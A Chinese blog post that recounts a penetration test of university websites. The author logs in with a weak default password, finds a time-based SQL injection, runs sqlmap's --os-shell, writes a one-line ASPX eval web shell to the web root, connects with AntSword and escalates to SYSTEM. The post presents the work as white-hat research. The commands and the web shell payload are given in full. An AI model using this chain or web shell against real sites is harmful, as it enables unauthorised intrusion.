TypechoJoeTheme

MUCN博客

统计
登录
用户名
密码
/
注册
用户名
邮箱

[渗透实战]记一次某高校网站的黑盒测试

2020-11-06
/
0 评论
/
425 阅读
/
正在检测是否收录...
11/06

0x1

  • 漏洞来源

啊吧啊吧啊吧啊吧啊吧啊吧啊吧啊吧,啊吧啊吧啊吧啊吧啊吧啊吧啊吧啊吧

两天后他找我了,他找到子域中的一处弱口令,内部存在w+信息泄露,果然努力的人运气都不会差,tql 要是我应该是测不到这处弱口令的 这个弱口令是admin/666666在我的字典里还就真没得这个666666的口令。。


0x2

  • 信息收集:

目前拥有:后台admin权限
web指纹:.net系统(就这个一个就够了 至少知道该上传啥马了)
waf类别:铱迅waf (本人亲眼见过rg哥以前bypass过这waf 手动狗头)


0x3

  • 渗透测试

看见能上传图片,首选肯定是测试上传漏洞.(此处本应该有图的 可惜我帅就不放截图了)
结果:不出所料,ip被禁.

等待ip解禁 尝试注入 无奈网站太多查询啥的 接口太多 试了几个决定放弃(心想:mmp这玩意估计是没得漏洞了)

如果是大佬接下来的操作估计就是bypass waf-上传木马-getshell-横向渗透-拿下域控
可惜了我不是

不要说啥xss csrf啥的 那些测得没得没啥意思.【硬气】


0x4

  • 横向查找,寻找不存在waf的同类型站点测试漏洞(当然这个横向查找这个词是我自编的)

经过简单的搜索找到几个同类型站点(也都是学校的)

此处备注:一般来说cms或者一些公司独自开发网站系统他们的初始密码也都是差不多的

横向查找到北京某校的站点尝试弱口令成功登入(谁让我运气好呢)


  • 查找漏洞

对于一些私人或者不大的公司开发的管理页面的往往开发者并不会那么在意攻击者的攻击
在多次抓包测试中成功找到一处查询点存在注入
时间盲注

  • 此处不得不说说 在sql注入的查找中limit或delect等函数这些都是极有可能被开发者遗忘的点,你觉得没漏洞的地方往往他就真的存在漏洞。

0x5

  • GETshell

因为我换了台电脑 就懒得截图了下面直接描述。

1. sqlmap -r 注入数据包.txt //跑出payload
2. sqlmap -r 注入数据包txt --current-user //跑出当前权限为sa(最高权限)
3. sqlmap -r 注入数据包.txt --os-shell //成功cmdshell
4. 信息收集 找到网站绝对路径// 多次尝试无果,找不到网站路径=白瞎。最终在网站下的配置下找到看着像的一个路径的框中得到网站路径(如图 路径.png)。
5. echo 123 >D:\DFMS\Visitor\1.txt//不确定这是正确网站路劲,先写个txt网站看看能不能访问到(当然成功访问到了)。
6. echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["mucn"],"unsafe");%^> >D:\DFMS\Visitor\mu.aspx//尖括号转义这很重要!!
7. 蚁剑连接拿下shell
路径.png

0x6

  • 提权

既然都做到这了,就尝试提下权吧(原始权限比较低,是iis的用户权限)。
在查阅资料的情况下(一看资料作者:j0....)j0大佬真强,最后成功使用“烂土豆”提权到system权限。

  • 别问为什么提权部分为什么写这么少
  • 写博客很累的

后续可能会出一期提权的内容供大家参考。


0x7

  • 提交漏洞 白帽子应有的责任。

最后完结,如果有对提权有问题的可以持续关注博客,或者留言或者问我。

mssql注入getshell提权
朗读
赞(4)
版权属于:

MUCN博客

本文链接:

https://mucn.site/index.php/%E6%B8%97%E9%80%8F/268.html(转载时请注明本文出处及文章链接)

评论 (0)